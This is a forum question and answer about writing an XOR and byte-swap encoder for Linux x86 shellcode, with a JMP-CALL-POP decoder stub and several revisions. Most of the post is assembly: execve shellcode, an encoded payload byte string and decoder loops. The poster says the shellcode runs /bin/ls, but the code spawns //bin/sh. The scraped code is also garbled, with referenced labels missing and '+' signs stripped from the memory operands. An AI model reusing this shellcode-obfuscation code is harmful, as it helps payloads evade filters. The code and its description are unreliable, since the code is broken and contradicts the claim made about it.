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Intel x86 (IA32) assembly decoder stub for custom encoder not working as expected


I have written a custom encoder which encodes my shellcode in this way:

First it reverses(swaps) all adjacent bytes in the original shellcode, and then it XORs each byte with value "0xaa" - I did all sanity check to ensure my original shellcode doesn't have this value, which might break my shellcode (by causing bad characters as a result of the encode). Output of my encoder:

Original Shellcode( 25 Bytes) :

Step1(Reverse adjacent Bytes)-Encoded Shellcode( 25 Bytes) :

Step2(XOR-each-BYTE-with-0xaa)-Encoded Shellcode( 25 Bytes) :

My original shellcode's purpose: it just executes /bin/ls on Linux systems using the "execve" syscall. Full code:

global _start

section .text

        ; PUSH the first null dword
        xor eax, eax
        push eax

        ; PUSH //bin/sh (8 bytes)

        push 0x68732f2f
        push 0x6e69622f

        mov ebx, esp

        push eax
        mov edx, esp

        push ebx
        mov ecx, esp

        mov al, 11
        int 0x80

In order to execute the shellcode I'm practicing how to write a decoder stub, which will decode my custom encoded shellcode, and then execute it on a target machine.

This is my decoder stub assembly code:

global _start

section .text

        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov cl, 12

        jmp short call_decoder

; first : decode by XOR again with same value 0xaa
        pop esi
        xor byte [esi], 0xaa
        jz decode2
        inc esi
        jmp short decode1

; second: rearrange the reversed adjacent BYTES, as part of encoding
        pop esi
        mov bl, byte [esi   eax]
        mov dl, byte [esi   eax   1]
        xchg bl, dl
        mov byte [esi   eax], bl
        mov byte [esi   eax   1], dl
        add al, 2
        loop decode2
        ; execute Shellcode
        jmp short Shellcode

        call decode1
        ; an extra byte 0xaa added at the end of encoded shellcode, as a marker to end of shellcode bytes.
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa

But above code gives me a segment fault. I'm unable to find a failure point on gdb debugger. Need some help on what I'm doing wrong.

CodePudding user response:

Based on comments made by @prl, these are the changes I did in my decoder stub, and now it works as expected:

global _start

section .text

; initialize registers
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov cl, 12
        jmp short call_decoder

; set starting address of Shellcode in esi register
        pop esi
        mov edi, esi

; first: decode by XOR again with same value 0xaa 
        xor byte [edi], 0xaa
        jz decode2
        inc edi
        jmp short decode1

; second: rearrange the reversed adjacent BYTES, as part of encoding
        mov bl, byte [esi   eax]
        mov dl, byte [esi   eax   1]
        xchg bl, dl
        mov byte [esi   eax], bl
        mov byte [esi   eax   1], dl
        add al, 2
        loop decode2

        jmp short Shellcode

        call decoder
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a,0xaa

EDIT2 : A much concise and a better looking code - also no need to hardcode the length of Shellcode:

global _start

section .text

        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        jmp short call_decoder

        pop esi
        mov cl, codeLen
        dec cl

        cmp al, cl
        jz last_byte_odd
        xor byte [esi   eax], 0xaa
        mov bl, byte [esi   eax]
        xor byte [esi   eax   1], 0xaa
        xchg byte [esi   eax   1], bl
        mov byte [esi   eax], bl
        add al, 1
        cmp al, cl
        jz Shellcode
        add al, 1
        jmp short decode

        xor byte [esi   eax], 0xaa
        jmp short Shellcode

        call decoder
        Shellcode: db 0x6a,0x9b,0xc2,0xfa,0x85,0x85,0xd9,0xc6,0x85,0xc2,0xc3,0xc8,0x23,0xc4,0xfa,0x49,0x48,0x23,0x23,0xf9,0x1a,0x4b,0x67,0xa1,0x2a
        codeLen         equ $-Shellcode

I leave it up to the low level and shell-coding enthusiasts, to decipher the logic.

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